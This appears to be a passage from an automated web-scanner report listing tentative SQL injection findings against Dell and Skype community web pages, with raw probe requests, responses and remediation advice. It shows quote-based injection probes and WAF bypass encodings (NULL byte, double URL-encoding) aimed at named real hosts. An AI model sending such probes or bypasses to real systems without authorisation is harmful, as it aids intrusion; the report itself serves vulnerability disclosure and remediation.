<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...
ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div>
...[SNIP]...

Request 2

GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23596
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...

1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sna/productdetail.aspx?sku=&1%00'=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25481
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:36 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...
ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div>
...[SNIP]...

Request 2

GET /sna/productdetail.aspx?sku=&1%00''=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...

1.3. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Android'/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 244364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/Android''/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.4. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/English/ct-p/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/English/ct-p/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 173560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 176531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-Manager/bd-p/Skype_Manager

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Skype-Manager/bd-p/Skype_Manager?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-Manager/bd-p/Skype_Manager?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.8. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-for-Business/bd-p/pt_business

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Skype-for-Business/bd-p'/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-for-Business/bd-p''/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...

1.9. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 162175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.10. http://community.skype.com/t5/Support-et-information/bd-p/fr_community [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Support-et-information/bd-p/fr_community

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Support-et-information/bd-p%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Support-et-information/bd-p%2527%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...

1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.12. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

